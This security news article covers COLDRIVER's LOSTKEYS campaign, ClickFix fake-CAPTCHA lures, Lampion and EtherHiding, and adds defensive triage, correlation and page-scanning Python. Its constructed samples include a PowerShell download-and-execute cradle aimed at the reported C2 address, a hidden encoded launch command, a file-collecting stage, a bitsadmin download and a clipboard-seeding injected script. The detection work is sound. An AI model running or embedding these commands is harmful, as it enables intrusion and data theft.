Russian Threat Actors Deploy New LOSTKEYS Malware via ClickFix Fake CAPTCHA Techniques


The Russia-linked threat actor known as COLDRIVER has been observed distributing a previously undocumented malware family tracked as LOSTKEYS, as part of an espionage campaign that relies on ClickFix-style social engineering.

According to the Google Threat Intelligence Group (GTIG), “LOSTKEYS is designed to exfiltrate files based on a predetermined list of file extensions and directories, while also gathering system information and active processes to relay back to the attacker.”

The malware was observed in January, March and April 2025 in highly targeted attacks against current and former advisors to Western governments and militaries, as well as journalists, think tanks and non-governmental organizations (NGOs). Individuals connected to Ukraine were also among the targets.

LOSTKEYS is the second custom malware family attributed to COLDRIVER after SPICA, and its use signals a continued move away from the group's traditional reliance on credential phishing. COLDRIVER is also tracked as Callisto, Star Blizzard and UNC4057.

Historically, the group has focused on credential theft; once it has broken into an account, it typically exfiltrates the victim's emails and contact list, as noted by Google security researcher Wesley Shields. “In select scenarios, COLDRIVER also deploys malware to the targeted device and may seek access to local files,” Shields elaborated.

The latest attack chain starts with a decoy website that displays a fake CAPTCHA check. The page instructs the victim to open the Windows Run dialog and execute a PowerShell command that the page has already placed on their clipboard, the hallmark of the ClickFix technique. Because the victim runs the command themselves, no exploit is needed and the first stage executes under the user's own account.

The pasted PowerShell command downloads and runs the next stage from a remote server (“165.227.148[.]68”). That second stage in turn acts as a downloader for the third, but only after running checks intended to stop the chain from executing inside virtual machines.

The third stage is a Base64-encoded blob that decodes to another PowerShell script, which runs LOSTKEYS on the compromised host. LOSTKEYS then collects system information, the list of running processes, and files matching a hard-coded list of extensions and directories.
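The chain described above (an encoded clipboard command, a downloader that gates on a VM check, and a Base64 blob that unpacks to the final script) is the kind of thing an analyst has to peel by hand. The Python below is an added triage example written for this article; it is not GTIG's tooling or the campaign's code. The three stages are constructed stand-ins for the real ones, the indicator regexes are editorial choices, and the only detail taken from the report is the address 165.227.148[.]68, which is refanged inside the sample so the host extractor has something to find and defanged again in the output. Nothing is fetched from the network: stage 2 is passed in as if it had already been captured from the server.

```python
"""Triage of a ClickFix-style PowerShell chain: peel the -EncodedCommand layer and any
nested FromBase64String() stage, then pull out hosts and cradle indicators.

Added example for this article, not code from GTIG or from the campaign. The three
stages below are constructed; only the C2 address 165.227.148[.]68 comes from the report.
"""
import base64
import re
from typing import Dict, List, Optional

# Editorial assumption: fragments that commonly mark ClickFix launch commands and cradles.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b", re.I),
    "in_memory_exec":  re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "nested_base64":   re.compile(r"frombase64string", re.I),
    "vm_check":        re.compile(r"win32_computersystem|vmware|virtualbox|hyper-v", re.I),
}
ENC_RE = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_ARG_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def defang(host: str) -> str:
    """Write the last dot as [.] so the report cannot be clicked by accident."""
    return "[.]".join(host.rsplit(".", 1))


def decode_encoded_command(command: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand / -enc / -e, or None."""
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_nested_stages(script: str) -> List[str]:
    """Decode every [Convert]::FromBase64String('...') literal (one level; triage() recurses)."""
    out = []
    for m in B64_ARG_RE.finditer(script):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    return out


def extract_hosts(text: str) -> List[str]:
    return sorted({defang(h) for h in URL_HOST_RE.findall(text)})


def triage(captured: List[str]) -> Dict:
    """Walk every captured stage plus whatever it decodes to, collecting indicators and hosts."""
    queue, stages, hits, hosts = list(captured), [], set(), set()
    while queue:
        stage = queue.pop(0)
        stages.append(stage)
        hits.update(name for name, rx in INDICATORS.items() if rx.search(stage))
        hosts.update(extract_hosts(stage))
        inner = decode_encoded_command(stage)
        if inner:
            queue.append(inner)
        queue.extend(decode_nested_stages(stage))
    chain = {"download_cradle", "in_memory_exec"} <= hits and bool(hits & {"encoded_command", "hidden_window"})
    return {"stages_seen": len(stages), "indicators": sorted(hits), "hosts": sorted(hosts),
            "verdict": "likely_clickfix_chain" if chain else "review"}


# Constructed sample chain (not the real payloads). Stage 3 stands in for the collector the
# report describes; stage 2 gates on a VM check and unpacks stage 3; stage 1 is the clipboard
# command, whose encoded script would fetch stage 2 from the reported address.
STAGE3 = ("Get-ChildItem $env:USERPROFILE -Recurse -Include *.docx,*.pdf | Select-Object FullName; "
          "Get-Process | Select-Object Name,Id")
STAGE2 = ("$m=(Get-CimInstance Win32_ComputerSystem).Model\n"
          "if($m -match 'VMware|VirtualBox|Virtual Machine'){exit}\n"
          "$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(STAGE3.encode()).decode() + "'))\n"
          "iex $s")
STAGE1_SCRIPT = "iex (iwr -UseBasicParsing http://165.227.148.68/stage2).Content"
CLIPBOARD_CMD = ("powershell -w hidden -ep bypass -enc "
                 + base64.b64encode(STAGE1_SCRIPT.encode("utf-16-le")).decode())

if __name__ == "__main__":
    # Stage 2 is passed in as if captured from the server, since nothing is fetched here.
    print(triage([CLIPBOARD_CMD, STAGE2]))
```

The verdict deliberately requires both a cradle and in-memory execution plus a ClickFix launch artifact (an encoded or hidden-window command), so a lone `iwr` in an admin's script does not trip it; the decoded hosts are what you would pivot on in proxy and DNS logs.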

As with SPICA, LOSTKEYS appears to be deployed only in selected cases, underscoring how targeted these intrusions are. Each infection chain also carries its own unique identifier and encryption key, which are needed to retrieve and decode the subsequent stage; a first stage captured from one victim therefore cannot simply be replayed to pull down the later payloads.

Google also reports finding older LOSTKEYS artifacts dating back to December 2023 that masquerade as binaries of the Maltego open-source investigation tool. It is not yet known whether those samples are connected to COLDRIVER, or whether the malware was repurposed from another developer or operation into the activity observed since January 2025.

Continued Adoption of ClickFix

ClickFix continues to be adopted by a growing range of threat actors delivering a variety of malware families, including the Lampion banking trojan and the macOS stealer Atomic Stealer.

Recent Lampion attacks documented by Palo Alto Networks Unit 42 start with phishing emails carrying ZIP attachments. The archive contains an HTML file that redirects the recipient to a counterfeit landing page, which walks them through the ClickFix steps and so kicks off a multi-stage infection.

Unit 42 notes that Lampion's infection chain is split into several non-consecutive stages, each executed as a separate process. This complicates detection: instead of a clear parent-child process tree, defenders see a scattered series of events, each of which can look innocuous on its own.
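A detection that only follows parent-child relationships will lose a chain like this as soon as one stage is launched by the Task Scheduler, because the scheduled script's parent is the scheduler's service host (svchost.exe on Windows 10 and later, taskeng.exe on older releases), not the dropper. The Python below is an added example for this article, not Unit 42's detection content and not Lampion's actual stages: it scores weak, individually unremarkable signals and then clusters them per host and user by time proximity, ignoring parent PIDs entirely. The events are constructed, the signal weights and thresholds are editorial choices, and 203.0.113.10 is a documentation-range address.

```python
"""Correlating a fragmented ClickFix chain without a process tree.

Added example for this article, not Unit 42's logic or Lampion's real stages. The events
are constructed: a Run-dialog PowerShell launch, a scheduled task it creates, a script that
the Task Scheduler starts minutes later under svchost.exe, and a LOLBin download from it.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List

SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SCHEDULER_PARENTS = {"svchost.exe", "taskeng.exe"}   # Task Scheduler launches tasks from here
LOLBIN_DOWNLOADERS = {"bitsadmin.exe", "certutil.exe", "curl.exe"}


def score_event(e: Dict) -> Dict[str, int]:
    """Weak signals with weights (editorial choices). None of them should page anyone alone."""
    cmd = e["cmdline"].lower()
    sig: Dict[str, int] = {}
    if e["image"] in SCRIPT_HOSTS and e["parent"] == "explorer.exe":
        sig["shell_from_explorer"] = 1        # what a Run-dialog / ClickFix launch looks like
    if re.search(r"-e(?:nc|ncodedcommand)?\s|-w(?:indowstyle)?\s+hidden", cmd):
        sig["encoded_or_hidden"] = 2
    if e["image"] == "schtasks.exe" and "/create" in cmd:
        sig["schtask_create"] = 1
    if e["image"] in SCRIPT_HOSTS and e["parent"] in SCHEDULER_PARENTS:
        sig["script_from_scheduler"] = 2      # the tree is cut here: parent is the scheduler
    if e["image"] in LOLBIN_DOWNLOADERS and "http" in cmd:
        sig["lolbin_download"] = 2
    if "\\appdata\\" in cmd and re.search(r"\.(?:vbs|js|ps1|hta)\b", cmd):
        sig["script_in_appdata"] = 1
    return sig


def correlate(events: List[Dict], window_minutes: int = 10,
              alert_score: int = 6, min_signals: int = 3) -> List[Dict]:
    """Cluster scored events per (host, user) when each is within the window of the previous one."""
    window = timedelta(minutes=window_minutes)
    ordered = sorted(enumerate(events), key=lambda p: (p[1]["host"], p[1]["user"], p[1]["ts"]))
    clusters: List[Dict] = []
    current = None
    for idx, e in ordered:
        sig = score_event(e)
        if not sig:
            continue                          # benign-looking event: neither extends nor breaks a cluster
        t = datetime.fromisoformat(e["ts"])
        key = (e["host"], e["user"])
        if current and current["key"] == key and t - current["last"] <= window:
            current["events"].append(idx)
            current["signals"].update(sig)
            current["score"] += sum(sig.values())
            current["last"] = t
        else:
            current = {"key": key, "events": [idx], "signals": dict(sig),
                       "score": sum(sig.values()), "last": t}
            clusters.append(current)
    return [{"host": c["key"][0], "user": c["key"][1], "events": c["events"], "score": c["score"],
             "signals": sorted(c["signals"]),
             "alert": c["score"] >= alert_score and len(c["signals"]) >= min_signals}
            for c in clusters]


# Constructed process-creation events (Sysmon event 1 / 4688 style), not a real capture.
EVENTS = [
    {"ts": "2025-05-07T09:00:05", "host": "WS01", "user": "alice", "image": "powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": "2025-05-07T09:00:09", "host": "WS01", "user": "alice", "image": "schtasks.exe",
     "parent": "powershell.exe",
     "cmdline": "schtasks /create /tn Updater /tr C:\\Users\\alice\\AppData\\Roaming\\sync.vbs /sc minute /mo 5"},
    {"ts": "2025-05-07T09:02:30", "host": "WS01", "user": "alice", "image": "notepad.exe",
     "parent": "explorer.exe", "cmdline": "notepad.exe notes.txt"},
    {"ts": "2025-05-07T09:05:01", "host": "WS01", "user": "alice", "image": "wscript.exe",
     "parent": "svchost.exe", "cmdline": "wscript.exe C:\\Users\\alice\\AppData\\Roaming\\sync.vbs"},
    {"ts": "2025-05-07T09:05:04", "host": "WS01", "user": "alice", "image": "bitsadmin.exe",
     "parent": "wscript.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high http://203.0.113.10/s3.dat "
                "C:\\Users\\alice\\AppData\\Roaming\\s3.dat"},
    {"ts": "2025-05-07T09:06:00", "host": "WS02", "user": "bob", "image": "powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell -NoProfile -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for c in correlate(EVENTS):
        print(c)
```

No single event in the sample scores above 3, so a per-event rule with a sane threshold stays quiet; the per-session cluster on WS01 reaches 10 across six distinct signals and fires, while bob's ordinary PowerShell launch on WS02 does not. Tune the window to how long the scheduled stage waits in the chains you actually see.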

Targets include Portuguese-speaking individuals and organizations across government, finance and transportation, according to Unit 42.

ClickFix has also been combined with a technique known as EtherHiding, in which the next-stage payload is retrieved from smart contracts on Binance's BNB Smart Chain (BSC) so that its delivery is hidden behind blockchain infrastructure. In the campaign in question the chain ends with the macOS information stealer Atomic Stealer.

According to an independent researcher who goes by Badbyte, interacting with the fake CAPTCHA causes the page's script to query a smart contract on BSC (the EtherHiding step) and copy a Base64-encoded command to the clipboard. The victim is then told to open Spotlight (⌘ + Space) to launch Terminal and paste the command (⌘ + V). That command downloads a script which in turn fetches and runs a signed Mach-O binary, confirmed to be Atomic Stealer.

The researcher also found that the campaign has likely compromised around 2,800 legitimate websites to serve the fake CAPTCHA prompts. This large-scale watering hole operation, dubbed MacReaper by the researcher, relies on obfuscated JavaScript, multiple full-screen iframes and blockchain-based command infrastructure to maximize the number of infections.
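On the web side, the pieces described in the last two paragraphs (a full-screen iframe over the real site, fake CAPTCHA wording, keystroke instructions, a clipboard write, and a payload read from a BSC contract) are what a site owner or web-content scanner can look for. The Python below is an added example for this article, not Badbyte's research code; the two pages it scans are constructed, the indicator regexes and weights are editorial assumptions, and the contract address is a placeholder. It tags a page as a ClickFix lure when a clipboard write is paired with CAPTCHA or keystroke text, and as EtherHiding when a BSC RPC endpoint is paired with a contract call; the extracted contract address and RPC endpoint are the indicators worth pivoting on across other compromised sites.

```python
"""Scanner for injected ClickFix / EtherHiding page code.

Added example for this article, not Badbyte's tooling. Both pages below are constructed:
one carries an injected script of the kind described (full-screen iframe, fake CAPTCHA,
clipboard write, payload pulled from a BSC contract); the other is an ordinary form.
"""
import re
from typing import Dict

# Editorial assumption: (weight, pattern) per indicator.
PAGE_INDICATORS = {
    "clipboard_write":        (3, r"navigator\.clipboard\.writeText\(|execCommand\(\s*['\"]copy['\"]"),
    "keystroke_instructions": (2, r"win\s*\+\s*r\b|⌘\s*\+\s*(?:space|v)\b|cmd\s*\+\s*(?:space|v)\b|\brun\s+dialog\b|\bterminal\b"),
    "fake_captcha_text":      (1, r"verify\s+you\s+are\s+human|i'?m\s+not\s+a\s+robot|verification\s+steps?"),
    "fullscreen_iframe":      (1, r"<iframe[^>]*position\s*:\s*fixed[^>]*(?:100vw|100%)[^>]*(?:100vh|100%)"),
    "bsc_rpc":                (2, r"bsc-dataseed|binance\.org"),
    "contract_call":          (2, r"eth\.Contract\(|eth_call|\.methods\.\w+\([^)]*\)\.call\("),
    "decode_and_eval":        (1, r"\batob\(|\beval\(|new\s+Function\("),
}
COMPILED = {name: (w, re.compile(p, re.I)) for name, (w, p) in PAGE_INDICATORS.items()}
CONTRACT_RE = re.compile(r"0x[0-9a-f]{40}\b", re.I)
RPC_RE = re.compile(r"https?://[a-z0-9.-]*(?:bsc-dataseed|binance\.org)[^\s\"'`)]*", re.I)


def scan_page(html: str) -> Dict:
    """Score indicator hits, derive tags, and pull out the contract address / RPC endpoint IOCs."""
    hits = {name: w for name, (w, rx) in COMPILED.items() if rx.search(html)}
    found = set(hits)
    tags = []
    if "clipboard_write" in found and found & {"keystroke_instructions", "fake_captcha_text"}:
        tags.append("clickfix_page")          # lure text plus a script that seeds the clipboard
    if {"bsc_rpc", "contract_call"} <= found:
        tags.append("etherhiding")            # payload is read from a contract on BSC
    return {"score": sum(hits.values()), "indicators": sorted(hits), "tags": tags,
            "contracts": sorted(set(CONTRACT_RE.findall(html))),
            "rpc_endpoints": sorted(set(RPC_RE.findall(html)))}


# Constructed pages. The contract address is a placeholder, not a real deployment.
CONTRACT = "0x" + "ab" * 20
INJECTED_PAGE = (
    '<html><body>\n'
    '<iframe style="position:fixed;top:0;left:0;width:100vw;height:100vh;z-index:2147483647;border:0"'
    ' src="about:blank"></iframe>\n'
    '<div id="captcha">Verify you are human: press ⌘ + Space, type Terminal, then ⌘ + V and Enter.</div>\n'
    '<script src="web3.min.js"></script>\n'
    '<script>\n'
    'const w3 = new Web3("https://bsc-dataseed1.binance.org");\n'
    'const c = new w3.eth.Contract(abi, "' + CONTRACT + '");\n'
    'c.methods.get().call().then(p => navigator.clipboard.writeText(atob(p)));\n'
    '</script></body></html>'
)
BENIGN_PAGE = (
    '<html><body><form action="/login" method="post">\n'
    '<label><input type="checkbox" name="human"> I\'m not a robot</label>\n'
    '<button>Sign in</button></form></body></html>'
)

if __name__ == "__main__":
    print(scan_page(INJECTED_PAGE))
    print(scan_page(BENIGN_PAGE))
```

A benign login form with an "I'm not a robot" checkbox hits only the wording indicator and gets no tag, which is the point of requiring the clipboard write: legitimate CAPTCHA widgets never need to seed the user's clipboard.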